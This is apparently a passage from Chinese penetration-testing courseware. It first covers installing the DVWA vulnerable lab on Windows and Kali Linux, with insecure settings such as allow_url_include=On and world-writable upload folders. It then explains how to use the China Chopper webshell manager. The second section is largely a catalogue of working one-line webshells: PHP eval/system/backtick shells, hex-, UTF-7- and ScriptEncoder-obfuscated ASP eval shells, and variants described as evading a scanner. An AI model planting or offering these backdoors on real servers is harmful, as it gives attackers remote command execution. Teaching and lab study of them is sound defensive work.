《Web服务器渗透实战》课件第1章

第一章渗透必备基础技术第一节搭建DVWA渗透测试平台第二节一句话后门利用及操作

第一节搭建DVWA渗透测试平台

1.1.1Windows下搭建DVWA渗透测试平台1.准备工作1)下载DVWA2)下载phpstudy2.安装软件(1)安装phpstudy。(2)将DVWA解压缩后的文件复制到phpstudy安装时指定的WWW文件夹下。(3)设置php.ini参数。运行phpstudy后，根据操作系统平台来选择不同的架构，如图1-1所示，安装完成后到程序安装目录下找到php.ini文件，将参数由“allow_url_include = Off”修改为“allow_url_include=On”，这样方便测试本地文件包含漏洞，保存后重启Apache服务器。(4)修改DVWA数据库配置文件。将“C:\phpstudy\WWW\dvwa\config\config.inc.php.dist”文件重命名为“config.inc.php”文件，修改其中的数据库配置为实际对应的值，在本例中MySQL数据库root密码为root，因此修改值如下：$_DVWA['db_server']='';$_DVWA['db_database']='dvwa';$_DVWA['db_user']='root';$_DVWA['db_password']='root';3.安装数据库并测试在运行中输入“cmd”→“ipconfig”命令获取本机IP地址，本例中使用地址http://30/dvwa/setup.php。安装DVWA，也可以使用localhost/dvwa/setup.php安装，如图1-2所示，根据提示操作即可完成安装。安装成功后，系统会自动跳转到30/dvwa/login.php登录页面，默认登录账号和密码为admin/password。登录系统后，需要设置“DVWASecurity”安全等级，然后进行漏洞测试，如图1-3所示。最后选择对应级别分别为1、2、3、4提交后即可。1.1.2在Kali2016上安装DVWA渗透测试平台最新版的Kali(2017.2)安装DVWA有一些问题，其默认php版本为php7.0，对DVWA环境不太匹配，但与Kali2016可以比较完美地结合。下面介绍如何使用Kali2016版本进行DVWA的安装。1.下载KaliLinux2.0如果有时间可以自己先安装虚拟机，然后再安装KaliLinux2.0系统，对于这个过程已经很熟练的用户，现成可用的虚拟机绝对是一个不错的选择。KaliLinux2.0目前在其官方网站上已经不能下载了，但可以通过btdig网站搜索来进行下载.2.下载DVWA最新版本3.平台搭建(1) apache2停止服务：serviceapache2stop(2)赋予dvwa文件夹相应的权限：chmod-R755/var/www/html/dvwa(3)开启MySQL：servicemysqlstartmysql-urootusemysqlcreatedatabasedvwa；exit在Kali中创建DVWA数据库，如图1-4所示。(4)配置php-gd模块支持：apt-getinstallphp7.0-gd(5)修改php.ini参数值allow_url_include。编辑 /etc/php/7.0/apache2/php.ini文件，修改812行“allow_url_include=Off”为“allow_url_include=On”，保存后退出。Vim编辑技巧：在键盘上使用Esc功能键后，输入“:”，然后输入“wq!”保存修改并退出Vim。(6)配置DVWA。打开终端，输入以下命令，进入到dvwa文件夹，配置uploads文件夹和phpids_log.txt可读可写可执行权限。cd/var/www/html/dvwachown-R777www-data:www-data/var/www/html/dvwa/hackable/uploadschownwww-data:www-datachown-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt(7)生成配置文件config.inc.php：cp/var/www/html/dvwa/config/config.inc.php.dist/var/www/html/dvwa/config/config.inc.phpvim/var/www/html/dvwa/config/config.inc.php修改第18行中“db_password='p@ssw0rd'”为实际的密码值，在本例中设置为空，如图1-5所示。4.访问并创建DVWA平台打开浏览器输入32/dvwa/setup.php。如图1-6所示，除了Google的验证码是Missing外，其他均为Enabled。单击创建(Create/ResetDatabase)，即可完成所有的配置。1.1.3在Kali2017上安装DVWA渗透测试平台最新版的Kali安装DVWA有一些问题，研究发现，KaliLinux最新版本也可以使用DVWA，其前面出现无法使用是由于MySQL授权问题，按照本节介绍的方法即可解决。1.安装之前的准备工作(1)下载KaliLinux最新版本。(2)下载DVWA最新版本。2.重新配置和安装php-gd(1)安装php-gd库：aptinstallphp-gd(2)查看php版本。php-v执行后显示结果如下：PHP7.0.22-3(cli)(built:Aug23201705:51:41)(NTS)Copyright(c)1997-2017ThePHPGroupZendEnginev3.0.0,Copyright(c)1998-2017ZendTechnologieswithZendOPcachev7.0.22-3,Copyright(c)1999-2017,byZendTechnologies(3)下载并将DVWA复制到网站目录：gitclone/ethicalhack3r/DVWA.gitmvDVWA/var/www/html/dvwa(4)修改/etc/php/7.0/apache2/php.ini文件，设置allow_url_include=On，初始设置其值为Off。赋予dvwa文件夹相应的权限，接着在终端中输入：chmod-R755/var/www/html/dvwachmod-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txtchmod-R777/var/www/html/dvwa/hackable/uploads(5)更改数据库密码和授权。登录MySQL数据库后执行命令：updateusersetpassword=password('12345678')whereuser='root'andhost='localhost';grantallprivilegeson*.*toroot@localhostidentifiedby'12345678';(6)修改数据库配置文件密码。cd/var/www/html/dvwa/configcpconfig.inc.php.distconfig.inc.php修改config.inc.php中的数据库配置为实际配置即可。(7)启动Apache2以及MySQL服务：serviceapache2restartservicemysqlrestart(8)通过浏览器对访问DVWA网站并进行相应设置。

第二节一句话后门利用及操作

1.2.1中国菜刀使用及管理1.执行中国菜刀中国菜刀的英文名为“Chopper”，可以到官方网站进行下载，解压缩后直接运行chopper.exe即可，如图1-7所示。2.添加Webshell在中国菜刀中单击右键，在弹出的菜单中选择“添加”命令，即可添加Webshell地址，如图1-8所示。在地址中输入一句话木马Webshell地址，地址后面是一句话木马的连接密码，在配置中选择脚本类型，程序会自动识别脚本类型，最后单击“添加”按钮即可添加一个Webshell地址。对于存在文件解析漏洞的网站Webshell地址，需要手动设置脚本类型，例如1.asp;1.html等格式文件，可以确定脚本是ASP语言，其他语言类似。3.连接一句话后门回到中国菜刀主界面，双击刚才添加的Webshell地址，即可连接一句话后门，如图1-9所示。如果后门执行成功，则会显示该网站的目录结构和详细文件等信息。4.执行文件操作通过中国菜刀客户端可以方便地对文件及文件夹等进行操作，如上传文件、下载文件、编辑、删除、复制、重命名、修改文件(夹)时间、新建和Access管理等，如图1-10所示。在中国菜刀中还可以对数据库进行管理，通过配置数据库用户名和用户密码等参数即可对数据库进行相应操作。1.2.2有关一句话后门的收集与整理1．php非一句话经典后门php运行时如果遇见字符“ ` ”(键盘上 ~ 符号的下挡键)总会尝试着执行“`”里面包含的命令，并返回命令执行的结果(string类型)。其局限性在于特征码比较明显，“`”符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并发出警报，而且“``”里面不能执行php代码。将以下代码保存为test.php：<?phpecho`$_REQUEST[id]`;?>执行代码test.php?id=dirc:/，即可查看C盘文件，id后的参数可以直接执行命令。2．加密的asp一句话后门将以下代码保存为asp文件，或者将以下代码插入到asp文件中，然后通过“黑狐专用一句话木马加强版”进行连接，其密码为“#”，执行效果如图1-11所示。<scriptlanguage=vbsrunat=server>Execute(HextoStr("65786563757465287265717565737428636872283335292929"))FunctionHextoStr(data)HextoStr="EXECUTE"""""C="&CHR(&H"N=")"DoWhileLen(data)>1IfIsNumeric(Left(data,1))ThenHextoStr=HextoStr&C&Left(data,2)&Ndata=Mid(data,3)ElseHextoStr=HextoStr&C&Left(data,4)&Ndata=Mid(data,5)EndIfLoopEndFunction</script><SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(String.fromCharCode(116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>3．新型ASP一句话后门<%Seto=Server.CreateObject("ScriptControl")o.language="vbscript"o.addcode(Request("cmd"))%>4．常见的asp一句话后门收集asp一句话木马：<%%25Execute(request("a"))%%25><%Execute(request("a"))%>%><%executerequest("a")%><%<scriptlanguage=VBScriptrunat=server>executerequest("a")</script><%25Execute(request("a"))%25>%><%executerequest("yy")%><%executerequest(char(97))%><%evalrequest(char(97))%>":executerequest("value"):a="<scriptlanguage=VBScriptrunat=server>ifrequest(chr(35))<>""""thenExecuteGlobalrequest(chr(35))</script>在access数据库中插入的一句话木马：┼攠數畣整爠煥敵瑳∨∣┩愾┼癥污爠煥敵瑳∨≡┩>密码为:autf-7的马：<%@codepage=65000%><%response.Charset="936"%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>ScriptEncoder加密：<%@LANGUAGE=VBScript.Encode%><%#@~^PgAAAA==r6P.;!+/D`14Dv&X#*@!@*ErPPD4+P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb * oBMAAA==^#~@%>可以躲过雷客图的一句话：<%setms=server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request",requestms.ExecuteStatement("ev"&"al(request(""1""))")%>php一句话：<?phpeval($_POST[cmd]);?><?php@eval($_POST[cmd]);?><?phpsystem($_REQUEST['cmd']);?><?phpeval($_POST[1]);?>aspx一句话：<scriptlanguage="C#"runat="server">WebAdmi